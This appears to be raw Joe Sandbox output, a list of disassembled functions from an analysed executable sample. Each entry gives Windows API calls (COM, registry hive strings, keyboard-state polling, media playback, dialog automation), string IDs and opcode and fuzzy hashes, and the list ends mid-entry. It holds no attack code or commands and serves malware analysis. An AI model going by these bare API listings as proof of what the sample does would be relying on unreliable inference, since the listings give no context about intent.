                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 56c3f3e8dffed63be3364b1631bcd38bb8ab453813e58c1981673da948b1bab9
                    • Instruction ID: 39d76d04f52104ed9780f6c68601bcc58b6481a0bc0e9f436f4cd8c142e8a148
                    • Opcode Fuzzy Hash: 56c3f3e8dffed63be3364b1631bcd38bb8ab453813e58c1981673da948b1bab9
                    • Instruction Fuzzy Hash: 6771E270601205BAEF349F24DC49FAABF65FF053A4F208216F529A61E1C7B96C20DB95
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007B8BEC
                    • CoInitialize.OLE32(00000000), ref: 007B8C19
                    • CoUninitialize.OLE32 ref: 007B8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 007B8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 007B8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007D2C0C), ref: 007B8E84
                    • CoGetObject.OLE32(?,00000000,007D2C0C,?), ref: 007B8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 007B8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007B8F3A
                    • VariantClear.OLEAUT32(?), ref: 007B8F4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,}
                    • API String ID: 2395222682-3650289849
                    • Opcode ID: d5ea4d59ba7b930dd7e9d646f30aad871201e4b127b42bde9a1b2d91495a1acb
                    • Instruction ID: cb4a386233183fe21407eb8a92c0d600f052d5731f485263f8930e3e04c5fa28
                    • Opcode Fuzzy Hash: d5ea4d59ba7b930dd7e9d646f30aad871201e4b127b42bde9a1b2d91495a1acb
                    • Instruction Fuzzy Hash: 62C124B1208305AFC740EF24C884A6BB7E9FF89748F00496DF5899B251DB35ED05CB62
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 36f79a783f7890f932ccad53b1806d895a3077dbd629de4b094dd982204fe152
                    • Instruction ID: fe08504025f8d1630865b367e8071b61ea5cac4a0a8e8a928df596cef7bd6491
                    • Opcode Fuzzy Hash: 36f79a783f7890f932ccad53b1806d895a3077dbd629de4b094dd982204fe152
                    • Instruction Fuzzy Hash: 26412D3025024EDBCF10EFA0DC95AEA3724BF12340F94456CEE925B252DB3CAD1AC790
                    APIs
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                      • Part of subcall function 00747A84: _memmove.LIBCMT ref: 00747B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: c388d561f18845eefa9ba5886733b62f294d3be39d150a353a8dfd5152337e8b
                    • Instruction ID: fef867284bc82256ac7d96a3cb2a6608b49a7f685f92d441d67dad76f9306fc8
                    • Opcode Fuzzy Hash: c388d561f18845eefa9ba5886733b62f294d3be39d150a353a8dfd5152337e8b
                    • Instruction Fuzzy Hash: AE1182A0A6016DB9D724A765CC8ADFF7B7CFFD2F00F400569B505A21D1DF681D05C5A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 76126be4c507e5d0cd6636955e3fa58c78c493c4f963b670acbdaebe7befd31a
                    • Instruction ID: db5c5bfda80acaa7bb2794f9856f36d9c24522f4ac71fb47bf17fc027e364233
                    • Opcode Fuzzy Hash: 76126be4c507e5d0cd6636955e3fa58c78c493c4f963b670acbdaebe7befd31a
                    • Instruction Fuzzy Hash: 8711E731904114EFCB24EB24DC0AEDB77BCDF82720F04427AF845A6091EFBDAA928651
                    APIs
                    • timeGetTime.WINMM ref: 007A521C
                      • Part of subcall function 00760719: timeGetTime.WINMM(?,75C0B400,00750FF9), ref: 0076071D
                    • Sleep.KERNEL32(0000000A), ref: 007A5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007A526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007A528E
                    • SetActiveWindow.USER32 ref: 007A52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007A52DA
                    • Sleep.KERNEL32(000000FA), ref: 007A52E5
                    • IsWindow.USER32 ref: 007A52F1
                    • EndDialog.USER32(00000000), ref: 007A5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: d85ee38791bb967ce362751ee95982cde5eeec47954249376dfac519710a735c
                    • Instruction ID: 792e1cd704f1825d005f3ae8163e15099e4bc18efe333df247860f62515d85ed
                    • Opcode Fuzzy Hash: d85ee38791bb967ce362751ee95982cde5eeec47954249376dfac519710a735c
                    • Instruction Fuzzy Hash: A121A1B0204744BFEB405F20EC88F663B6AFBD6346F045528F501921B1DBADAC508B25
                    APIs
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • CoInitialize.OLE32(00000000), ref: 007AD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007AD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 007AD8FC
                    • CoCreateInstance.OLE32(007D2D7C,00000000,00000001,007FA89C,?), ref: 007AD948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007AD9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 007ADA0F
                    • _memset.LIBCMT ref: 007ADA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 007ADA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007ADAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 007ADAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007ADAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 007ADAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: 5be9a583bd21d50a54765546a0d0c670d01c2e319006b5c464f03ecd60d33dd8
                    • Instruction ID: ecf4eaec47f047ebd26218b62b29bdf6dce6f2bea5cec10cfb1bc3bc9a30f388
                    • Opcode Fuzzy Hash: 5be9a583bd21d50a54765546a0d0c670d01c2e319006b5c464f03ecd60d33dd8
                    • Instruction Fuzzy Hash: BCB1FC75A00109EFDB14DF64C888DAEBBF9EF89314B048569F90AEB251DB34EE45CB50
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007A05A7
                    • SetKeyboardState.USER32(?), ref: 007A0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 007A0632
                    • GetKeyState.USER32(000000A0), ref: 007A0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 007A0678
                    • GetKeyState.USER32(000000A1), ref: 007A0689
                    • GetAsyncKeyState.USER32(00000011), ref: 007A06B5
                    • GetKeyState.USER32(00000011), ref: 007A06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 007A06EC
                    • GetKeyState.USER32(00000012), ref: 007A06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 007A0723
                    • GetKeyState.USER32(0000005B), ref: 007A0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
                    • Instruction ID: 2ba3b2796deee0fdeb28e20380077d7f96aab53155500692bca2243a2c6fc6bf
                    • Opcode Fuzzy Hash: 784e260a1d44e8c9102fc163a9c6b2ac10ca26a155cb9fa299de9479b26d4988
                    • Instruction Fuzzy Hash: F651CD20E0478859FB35DBA08854BEAAFB59F83380F484B99D5C1571C2D66CAA4CCF95
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 0079C746
                    • GetWindowRect.USER32(00000000,?), ref: 0079C758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079C7B6
                    • GetDlgItem.USER32(?,00000002), ref: 0079C7C1
                    • GetWindowRect.USER32(00000000,?), ref: 0079C7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079C827
                    • GetDlgItem.USER32(?,000003E9), ref: 0079C835
                    • GetWindowRect.USER32(00000000,?), ref: 0079C846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079C889
                    • GetDlgItem.USER32(?,000003EA), ref: 0079C897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079C8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0079C8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
                    • Instruction ID: 80ff444198236a765d276aa4430a3cfbbeb5680e4baaac8fe05e536f176992c1
                    • Opcode Fuzzy Hash: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
                    • Instruction Fuzzy Hash: 99513E71B00205AFDF18CFA9DD99EAEBBBAEB88310F14812DF516E7290D7749D008B54
                    APIs
                      • Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007420D3
                    • KillTimer.USER32(-00000001,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0074216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 0077BEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0077BF5A
                    • DeleteObject.GDI32(00000000), ref: 0077BF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: f3320587614b92a1dbac0fcb85a2c04a8e18a7240ed489c4a4c8dcf791f4bac8
                    • Instruction ID: 7a59ce8a8ed324dfbfe534505e14623b4e9682edcdf411caf25c758799beb303
                    • Opcode Fuzzy Hash: f3320587614b92a1dbac0fcb85a2c04a8e18a7240ed489c4a4c8dcf791f4bac8
                    • Instruction Fuzzy Hash: 4D618630100610DFCB65AF14DD48B2AB7F2FB50716F90C52DE1468AAB2C779A8B2DF90
                    APIs
                      • Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC
                    • GetSysColor.USER32(0000000F), ref: 007421D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: f52b7a10208fb3bb814790810cb9634a44c0bf08967761cf7463e6a942b92425
                    • Instruction ID: 2214e6ecd2a91dc7d0fbd7a67e9a197fc02cd4738766cd968a908dfda65a7e45
                    • Opcode Fuzzy Hash: f52b7a10208fb3bb814790810cb9634a44c0bf08967761cf7463e6a942b92425
                    • Instruction Fuzzy Hash: 1341B3311001549FDB215F28EC48BB93B66FB06331F998269FE658A1E2C7798C52DB25
                    APIs
                    • CharLowerBuffW.USER32(?,?,007CF910), ref: 007AAB76
                    • GetDriveTypeW.KERNEL32(00000061,007FA620,00000061), ref: 007AAC40
                    • _wcscpy.LIBCMT ref: 007AAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 063743e3695365ff003e12d56d43db94ae9bdaea7e5cfa519e5dfbd56c3e5087
                    • Instruction ID: 66e8192ed97b2c01f90bca22d9c7344e9f7e955e68e2c75d6b143ec76966a525
                    • Opcode Fuzzy Hash: 063743e3695365ff003e12d56d43db94ae9bdaea7e5cfa519e5dfbd56c3e5087
                    • Instruction Fuzzy Hash: 2651A271208305EBC714EF14C885AAFB7A5EF85310F148A2DF596572A2DB39DD09CB63
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: db51ed75096d7ec74a6df1c0cface20eb262b4ba8e529c0beaff474987361971
                    • Instruction ID: 287ffd24f2bf493019eac87aa0e1cae21ea87f0d3d831335982298a2d9ae7390
                    • Opcode Fuzzy Hash: db51ed75096d7ec74a6df1c0cface20eb262b4ba8e529c0beaff474987361971
                    • Instruction Fuzzy Hash: 3641A271604205EEDF249B38D946E7773E8EB45300F24846EEA4ED7291EB79A942CB11
                    APIs
                    • _memset.LIBCMT ref: 007C73D9
                    • CreateMenu.USER32 ref: 007C73F4
                    • SetMenu.USER32(?,00000000), ref: 007C7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C7490
                    • IsMenu.USER32(?), ref: 007C74A6
                    • CreatePopupMenu.USER32 ref: 007C74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C74DD
                    • DrawMenuBar.USER32 ref: 007C74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: e7ca4cf748910632df43bdee5529c73daa0e16e82b29da3b81885126c42f29b7
                    • Instruction ID: db49ad92475e6a19ed415bfa48877f3156cac1cf73addf8a2276ef93326f2edb
                    • Opcode Fuzzy Hash: e7ca4cf748910632df43bdee5529c73daa0e16e82b29da3b81885126c42f29b7
                    • Instruction Fuzzy Hash: 3C411775A00245EFDB18DF64E844F9ABBB9FF49310F14402DEA5597350DB39AA20CF54
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007C77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 007C77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007C77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 007C77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007C77FA
                    • DeleteDC.GDI32(00000000), ref: 007C7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 007C780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007C7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007C782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
